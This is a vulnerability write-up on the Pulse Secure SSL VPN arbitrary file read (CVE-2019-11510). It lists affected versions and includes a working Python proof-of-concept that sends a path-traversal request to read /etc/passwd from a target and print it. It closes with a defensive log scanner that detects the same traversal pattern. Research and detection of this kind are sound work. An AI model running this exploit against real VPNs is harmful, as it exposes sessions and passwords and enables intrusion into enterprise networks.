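(CVE-2019-11510) Pulse Secure SSL VPN Arbitrary File Read
I. Vulnerability Overview
Pulse Secure Pulse Connect Secure (also known as PCS, formerly Juniper Junos Pulse) is an SSL VPN solution from the US company Pulse Secure. CVE-2019-11510 is caused by missing security restrictions in a newly introduced feature for accessing other ports through the browser. Any attacker can exploit it without authentication to read sensitive system files and obtain sensitive information such as sessions and plaintext passwords, then break into and take control of the VPN, which in turn threatens services on the enterprise intranet.
II. Affected Versions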
Pulse Secure PCS 9.0RX
Pulse Secure PCS 8.3RX
Pulse Secure PCS 8.2RX
Pulse Secure PCS 8.1R15.1
III. Reproduction
PoC
Pcs_Ssl_Vpn_CVE_2019_11510@Coco413.py
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Python 2 script: relies on urlparse, reload(sys) and print statements.
import sys
import urlparse
import requests
import warnings
import traceback

reload(sys)
sys.setdefaultencoding('utf-8')
# Certificate verification is disabled below, so silence the resulting warnings.
requests.packages.urllib3.disable_warnings()
warnings.filterwarnings("ignore")


def CVE_2019_11510(base_url):
    try:
        # Traversal request path, and the string expected in /etc/passwd.
        payloads, keywords = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/", "root:x"
        r = requests.get(base_url + payloads, verify=False)
        r.close()
        if keywords in r.text:
            print "[✓] Found CVE-2019-11510 Vuln address(curl --path-as-is -s -k <target>):\n{}\n{}".format(
                base_url + payloads, r.content)
        else:
            print "[x] Not Found Vuln!"
    except requests.exceptions.ConnectionError:
        pass
    except requests.ReadTimeout:
        pass
    except:
        traceback.print_exc()


if __name__ == '__main__':
    if len(sys.argv) == 1:
        print '[+] Tip: python Pcs_Ssl_Vpn_CVE_2019_11510@Coco413.py <url>'
        sys.exit(0)
    url = sys.argv[1]
    # Only scheme and hostname of the supplied URL are used.
    CVE_2019_11510(urlparse.urlparse(url).scheme + "://" + urlparse.urlparse(url).hostname)
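
A defender-side counterpart to the request the PoC above sends, added here as an example (it is not part of the original write-up or of any Pulse Secure tooling): a Python 3 scan of web access logs for request targets that still carry unresolved `..` segments together with the `/dana/html5acc/guacamole/` element. The combined log format, the function names and the sample lines are assumptions constructed for illustration, and the check only works on logs that record the request target exactly as received.

```python
import re

# Assumed log layout: combined log format, raw (un-normalized) request target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
PCT_RE = re.compile(r"%([0-9A-Fa-f]{2})")
MARKER = "/dana/html5acc/guacamole/"  # path element taken from the PoC request


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (%2e, %252e, ...) up to max_rounds."""
    for _ in range(max_rounds):
        decoded = PCT_RE.sub(lambda m: chr(int(m.group(1), 16)), value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal_probe(target):
    """True if the target has unresolved '..' path segments AND the marker."""
    path, _, query = target.partition("?")
    path = fully_decode(path).replace("\\", "/")
    query = fully_decode(query)
    has_dotdot = ".." in path.split("/")
    has_marker = MARKER in path or MARKER in query
    return has_dotdot and has_marker


def scan(lines):
    """Return (client_ip, status, raw_target) for each matching log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_traversal_probe(m.group("target")):
            hits.append((m.group("ip"), int(m.group("status")), m.group("target")))
    return hits


# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [20/Aug/2019:10:00:01 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 200 1532',
    '198.51.100.9 - - [20/Aug/2019:10:00:05 +0000] "GET /dana-na/%2e%2e/dana/html5acc/guacamole/%2e%2e/%2e%2e/etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 404 0',
    '192.0.2.44 - - [20/Aug/2019:10:01:00 +0000] "GET /dana/html5acc/guacamole/ HTTP/1.1" 200 5120',
    '192.0.2.44 - - [20/Aug/2019:10:01:02 +0000] "GET /static/../img/logo.png HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for ip, status, target in scan(SAMPLE):
        print(ip, status, target)
```

A hit with status 200 deserves priority over one with 404, since it indicates the file content was actually returned.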